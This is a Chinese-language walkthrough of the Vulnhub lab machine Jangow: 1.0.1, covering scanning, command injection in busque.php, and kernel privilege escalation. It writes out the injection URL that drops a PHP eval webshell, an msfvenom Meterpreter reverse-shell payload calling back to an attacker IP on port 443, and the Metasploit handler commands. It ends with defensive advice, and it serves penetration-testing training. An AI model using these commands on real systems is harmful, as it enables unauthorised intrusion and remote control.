vulnhub系列2——Jangow: 1.0.1
字数 1192 2025-08-11 21:26:06
Jangow: 1.0.1 靶场实战教学文档
1. 靶场概述
Jangow: 1.0.1 是一个来自 Vulnhub 的渗透测试靶机,难度为初级到中级。本靶场主要考察以下技能:
- 信息收集
- Web应用漏洞利用
- 命令注入漏洞
- 反弹Shell技术
- 权限提升技术
2. 环境准备
2.1 下载靶机
从 Vulnhub 下载 Jangow: 1.0.1 靶机镜像文件
2.2 网络配置
- 攻击机IP: 192.168.56.105 (示例)
- 靶机IP: 192.168.56.118 (通过扫描发现)
3. 渗透测试步骤
3.1 信息收集
3.1.1 主机发现
netdiscover -r 192.168.56.0/24
3.1.2 端口扫描
nmap -sV -Pn -sC 192.168.56.118
预期发现开放端口:
- 80/tcp: HTTP服务
3.2 Web应用渗透
3.2.1 发现命令注入漏洞
在网页中发现存在命令执行功能的页面:
http://192.168.56.118/site/busque.php?buscar=
3.2.2 写入WebShell
使用命令注入写入一句话木马:
http://192.168.56.118/site/busque.php?buscar=echo '<?=@eval($_POST[1]);' >a.php
这将创建一个名为a.php的WebShell文件,可使用蚁剑连接。
3.3 反弹Shell
3.3.1 生成PHP Meterpreter payload
msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.56.105 lport=443 -f raw -o shell.php
注意:根据实战经验,只有443端口能成功反弹Shell
3.3.2 上传并执行payload
通过蚁剑上传shell.php文件,然后通过浏览器访问执行
3.3.3 Metasploit监听
设置Metasploit监听:
msfconsole
use exploit/multi/handler
set payload php/meterpreter/reverse_tcp
set LHOST 192.168.56.105
set LPORT 443
exploit
3.4 交互式Shell获取
在Meterpreter会话中获取交互式Shell:
python3 -c "import pty;pty.spawn('/bin/bash');"
3.5 权限提升
3.5.1 使用CVE-2017-16695提权
该漏洞是Linux内核提权漏洞,利用步骤如下:
- 在目标机器上编译或上传利用代码
- 执行利用程序
- 获取root权限
3.5.2 替代提权方法
如果CVE-2017-16695不可用,可尝试以下方法:
- 查找SUID/SGID文件
- 检查内核版本寻找其他漏洞
- 检查crontab任务
- 检查可写配置文件
4. 关键点总结
- 信息收集要全面:通过netdiscover和nmap全面了解目标环境
- 命令注入利用:busque.php页面的命令注入是初始突破口
- 反弹Shell技巧:注意443端口的特殊性
- 交互式Shell:使用Python获取完整TTY
- 提权方法:CVE-2017-16695是有效提权路径
5. 防御建议
- 输入验证:对所有用户输入进行严格过滤
- 最小权限原则:Web应用运行账户应限制权限
- 及时更新:保持系统和内核版本最新
- 日志监控:监控异常命令执行行为
- WebShell检测:部署WebShell检测机制
6. 扩展学习
- 研究其他Linux内核提权漏洞
- 学习多种反弹Shell方法
- 探索不使用Metasploit的渗透方法
- 研究更隐蔽的持久化技术
通过本靶场练习,可以全面掌握从信息收集到权限提升的完整渗透测试流程,特别适合Web渗透和提权技术的学习。